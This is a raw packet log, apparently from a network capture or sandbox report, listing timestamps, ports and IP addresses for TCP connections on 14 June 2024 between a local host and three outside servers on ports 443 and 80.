Jun 14, 2024 15:15:08.009480000 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009597063 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009623051 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009660959 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009665966 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009697914 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009716034 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009838104 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009870052 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009902000 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009907007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.009938002 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.009955883 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010076046 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010092020 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010149002 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010154963 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010201931 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010260105 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010277987 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010324955 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010329008 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010360003 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010377884 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010472059 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010489941 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010544062 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010549068 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010596037 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010667086 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010684967 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010730028 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010735035 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010766029 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010785103 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010857105 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010874033 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010917902 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010924101 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.010956049 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.010974884 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011053085 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011070013 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011121988 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011126995 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011156082 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011173964 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011255980 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011274099 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011322021 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011327028 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011359930 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011379004 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011442900 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011460066 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011509895 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011514902 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011548042 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011565924 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011640072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011657000 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011713028 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011718988 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011765003 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011852980 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011869907 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011924982 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.011929989 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.011977911 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012042046 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012058973 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012116909 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012123108 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012170076 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012237072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012254000 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012305021 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012310028 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012341022 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012358904 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012430906 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012448072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012497902 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012502909 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012528896 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012547016 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012636900 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012654066 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012706995 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012712002 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012761116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012837887 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012859106 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012900114 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012904882 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.012936115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.012953997 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013026953 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013042927 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013096094 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013101101 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013134003 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013150930 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013221979 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013238907 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013293028 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013298988 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013422012 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013442039 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013456106 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013462067 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013479948 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013523102 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013614893 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013638020 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013712883 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013717890 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013772964 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013808966 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013825893 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013878107 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013883114 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.013894081 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.013936996 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014014006 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014029026 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014081955 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014086962 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014120102 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014138937 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014206886 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014224052 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014281034 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014285088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014318943 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014337063 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014411926 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014427900 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014480114 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014484882 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014516115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014533997 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.014595032 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014647007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:08.014688015 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.022727013 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:08.022742987 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:13.179838896 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:13.833587885 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:13.833741903 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:13.835041046 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:13.840087891 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517054081 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517138004 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517174006 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517193079 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517206907 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517245054 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517262936 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517282009 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517318010 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517327070 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517353058 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517388105 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517394066 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517420053 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517462015 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517538071 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517573118 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517618895 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.517740965 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.517802000 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.522564888 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522623062 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522627115 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.522659063 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522711039 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.522768021 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522840977 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522883892 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.522897005 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522933006 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522965908 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.522977114 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.523807049 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.523859978 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.523864985 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.523895979 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.523931026 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.523961067 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.523964882 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524017096 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.524705887 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524811029 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524827957 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524844885 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524854898 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.524863005 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.524883032 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.527659893 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.527723074 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.527832985 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.527879953 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.527925014 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.528143883 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.528156996 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.528209925 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.528486967 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.528698921 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.528759956 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.528902054 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529239893 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529288054 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529289007 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.529301882 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529340982 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.529675007 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529743910 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.529791117 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.530085087 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.530098915 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.530148029 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.530436039 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.531299114 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.531352997 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.533735037 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533751011 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533763885 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533776999 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533811092 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.533843040 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533853054 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.533883095 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533894062 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533921003 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.533950090 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.533997059 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.534288883 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534351110 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534363031 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534373999 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534392118 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.534430027 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.534832954 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534847021 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534857035 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534872055 CEST	80	49709	93.123.39.71	192.168.2.8
Jun 14, 2024 15:15:15.534888983 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.534915924 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:15.966860056 CEST	49709	80	192.168.2.8	93.123.39.71
Jun 14, 2024 15:15:16.157483101 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.157557964 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:16.157617092 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.163284063 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.163326979 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:16.781860113 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:16.781939030 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.784889936 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.784903049 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:16.785195112 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:16.833504915 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.868926048 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:16.912507057 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464528084 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464730978 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464776993 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464781046 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.464807987 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464824915 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.464850903 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464879990 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.464920044 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.464927912 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.465018988 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.465979099 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.505403042 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.580703974 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.580759048 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.580812931 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.580838919 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.580849886 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.580888987 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.594444036 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594506025 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594536066 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.594537973 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594558001 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594602108 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.594708920 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594744921 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594789982 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.594794035 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.594829082 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.594861031 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.595566988 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.595603943 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.595618010 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.595623016 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.595654011 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.595695972 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.595700979 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.596293926 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.596445084 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.596508980 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.596541882 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.596570015 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.596574068 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.596673012 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.698185921 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698390961 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698446035 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.698477983 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698565960 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698613882 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.698625088 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698723078 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698805094 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.698856115 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.698868990 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.699116945 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.699122906 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.711936951 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.712021112 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.712091923 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.712127924 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.712179899 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.723718882 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.723803043 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.723987103 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.724050045 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.724638939 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.724719048 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.725013018 CEST	443	49710	188.114.96.3	192.168.2.8
